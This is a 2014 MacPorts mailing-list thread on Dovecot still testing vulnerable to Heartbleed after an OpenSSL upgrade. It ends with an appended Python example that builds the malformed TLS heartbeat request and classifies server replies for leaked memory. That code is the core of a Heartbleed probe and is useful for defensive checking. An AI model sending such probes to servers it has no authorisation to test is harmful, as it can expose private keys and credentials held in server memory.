Heartbleed: dovecot2 is still vulnerable after upgrade of OpenSSL library
Winfried Dietmayer
Winfried.Dietmayer at t-online.de
Mon Apr 28 01:27:47 PDT 2014
Hi Clemens,
> - Dovecot still has an old copy of OpenSSL embedded that it uses for
> those places that handle the TLS connection. I think that one is
> unlikely given that you did rebuild dovecot and that it has been
> revbumped. Nevertheless you should be able to rule it out by
> re-installing dovecot from the binary archives that are now
> available on the packages server. That would give you the exact
> binary I've been using, which wasn't vulnerable on my system.
I reinstalled dovecot from the MacPorts packages server, but to no avail. The vulnerability is still there.
> - The port you're testing is not actually being served by the dovecot
> instance we've been looking at. Please verify that you're actually
> testing the correct dovecot instance by stopping all possible
> dovecot servers, starting one manually using
> $> sudo /opt/local/sbin/dovecot -F
> and checking that it is the one listening on the port you test using
> $> lsof -i tcp:$port
The right dovecot instance is listening on port 993.
> You could also try running another SSL-enabled service using the same
> OpenSSL version (e.g. apache2 from MacPorts) and check if that is
> vulnerable to heartbleed.
I installed 'apache2' as a MacPorts binary:
————
$ cardiac/10632982/cardiac-arrest.py -a -p 443 localhost | grep -i -E '(fail|not)'
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[INFO] No heartbeat response was received. The server is probably not vulnerable.
[PASS] localhost:443 (127.0.0.1:443) does not appear to be vulnerable to Heartbleed!
————
Thus, apache seems *not* to be vulnerable.
I tried several other things:
- I safe-booted the machine and the vulnerability is *gone*. Of course this is not an option in real life.
- I deleted the cache of the dynamic libraries in /var/db/dyld/ and rebooted. The vulnerability is still there.
- I built dovecot and OpenSSL from the original tarballs from their respective project sites.
The result is the same: dovecot is still vulnerable to the Heartbleed bug.
To summarize:
- dovecot is vulnerable on my system regardless of whether the binaries are built via MacPorts or from the original tarballs.
- apache is not vulnerable using the same OpenSSL library.
- dovecot is not vulnerable if the machine is safe-booted.
This is all really weird.
Thank you for your help so far; any further help is of course much appreciated.
Regards,
Winfried
On 24.04.2014 at 15:01, Clemens Lang <cal at macports.org> wrote:
> Hi Winfried,
>
>> --------
>> Apr 23 10:55:55 Winfrieds-XXXX.local dovecot[66453]: imap-login:
>> Error: dyld: loaded: /opt/local/lib/libssl.1.0.0.dylib
>> Apr 23 10:55:55 Winfrieds-XXXX.local dovecot[66453]: imap-login:
>> Error: dyld: loaded: /opt/local/lib/libcrypto.1.0.0.dylib
>> --------
>
>> --------
>> OpenSSL 1.0.1g 7 Apr 2014
>> SSLv2 part of OpenSSL 1.0.1g 7 Apr 2014
>> SSLv3 part of OpenSSL 1.0.1g 7 Apr 2014
>> TLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
>> DTLSv1 part of OpenSSL 1.0.1g 7 Apr 2014
>> --------
>
> OK, so your dovecot uses the correct OpenSSL library and that library
> is a version that shouldn't be vulnerable to the heartbleed issue.
> That leaves a few other things to rule out:
> - Dovecot still has an old copy of OpenSSL embedded that it uses for
> those places that handle the TLS connection. I think that one is
> unlikely given that you did rebuild dovecot and that it has been
> revbumped. Nevertheless you should be able to rule it out by
> re-installing dovecot from the binary archives that are now
> available on the packages server. That would give you the exact
> binary I've been using, which wasn't vulnerable on my system.
> - The port you're testing is not actually being served by the dovecot
> instance we've been looking at. Please verify that you're actually
> testing the correct dovecot instance by stopping all possible
> dovecot servers, starting one manually using
> $> sudo /opt/local/sbin/dovecot -F
> and checking that it is the one listening on the port you test using
> $> lsof -i tcp:$port
>
> You could also try running another SSL-enabled service using the same
> OpenSSL version (e.g. apache2 from MacPorts) and check if that is
> vulnerable to heartbleed.
>
> --
> Clemens Lang
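Added example (not part of the original message, and not code from cardiac-arrest.py, Dovecot, OpenSSL or MacPorts): the core of a Heartbleed probe like the one used above, in Python. It builds the TLS heartbeat record whose length field lies about its payload and classifies what a server sends back. The SAMPLE_* replies are constructed byte strings, not captures from any real server, and the CT_* constants and the build_heartbeat_request()/parse_records()/classify_response() helpers are this example's own names.

```python
"""Heartbleed (CVE-2014-0160) probe builder and response classifier.

Added example for this thread; it is not code from the original message,
from Dovecot, from MacPorts or from the cardiac-arrest.py script referred
to above. It shows the two halves of the check such a script performs:
build the malformed TLS heartbeat request, then decide from the server's
reply whether it leaked memory. The SAMPLE_* byte strings are constructed
here for illustration and are not captures from any real server.
"""
import struct

# TLS record-layer content types (RFC 5246, RFC 6520).
CT_ALERT = 0x15
CT_HEARTBEAT = 0x18
TLS_1_1 = b"\x03\x02"

# RFC 6520 requires at least 16 bytes of padding in a heartbeat message.
HB_MIN_PADDING = 16


def build_heartbeat_request(claimed_len=0x4000, version=TLS_1_1):
    """Return a heartbeat record whose length field lies about its payload.

    Heartbeat message layout: type(1) | payload_length(2) | payload | padding.
    We send only the 3-byte header with payload_length=claimed_len.  Fixed
    OpenSSL (1.0.1g) checks payload_length against the record length and
    silently drops the message; vulnerable 1.0.1 through 1.0.1f copies
    claimed_len bytes out of its heap into the response.
    """
    hb_msg = struct.pack("!BH", 0x01, claimed_len)      # type=request, bogus length
    return struct.pack("!B2sH", CT_HEARTBEAT, version, len(hb_msg)) + hb_msg


def parse_records(data):
    """Split a raw byte stream into (content_type, version, payload) records."""
    records = []
    off = 0
    while off + 5 <= len(data):
        ctype, ver, length = struct.unpack("!B2sH", data[off:off + 5])
        payload = data[off + 5:off + 5 + length]
        if len(payload) < length:
            break                                   # truncated: wait for more
        records.append((ctype, ver, payload))
        off += 5 + length
    return records


def classify_response(data, sent_payload_len=3):
    """Map the bytes read after sending the probe to a verdict.

    'vulnerable'     : a heartbeat record came back carrying more than the
                       request plus minimum padding, i.e. heap contents
    'not_vulnerable' : the server answered with an alert (or an honest-sized
                       heartbeat), so it validated the length
    'no_heartbeat'   : nothing heartbeat-related at all, which is what
                       cardiac-arrest.py reports as 'No heartbeat response'
    """
    for ctype, _ver, payload in parse_records(data):
        if ctype == CT_HEARTBEAT:
            if len(payload) > sent_payload_len + HB_MIN_PADDING:
                return "vulnerable"
            return "not_vulnerable"
        if ctype == CT_ALERT:
            return "not_vulnerable"
    return "no_heartbeat"


# Constructed sample replies (not real captures).  A real leak would arrive
# as 16 KiB records; 256 bytes of 'A' stands in for leaked heap here.
SAMPLE_LEAK = (struct.pack("!B2sH", CT_HEARTBEAT, TLS_1_1, 256)
               + struct.pack("!BH", 0x02, 0x4000) + b"A" * 253)
# Fatal alert 'unexpected_message' (level 2, description 10).
SAMPLE_ALERT = struct.pack("!B2sH", CT_ALERT, TLS_1_1, 2) + b"\x02\x0a"
SAMPLE_SILENT = b""


if __name__ == "__main__":
    probe = build_heartbeat_request()
    print("probe:", probe.hex())
    for name, sample in (("leak", SAMPLE_LEAK), ("alert", SAMPLE_ALERT),
                         ("silent", SAMPLE_SILENT)):
        print(f"{name:6s} -> {classify_response(sample)}")
```

A live check would first complete the TLS handshake with the server, then send build_heartbeat_request() and pass the bytes read back into classify_response(). A verdict of 'no_heartbeat' is the situation behind the '[INFO] No heartbeat response was received' lines above, which is also why that message alone only says 'probably not vulnerable': a server that never enabled the heartbeat extension and a patched one that silently drops the bad request look the same from outside.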
More information about the macports-users mailing list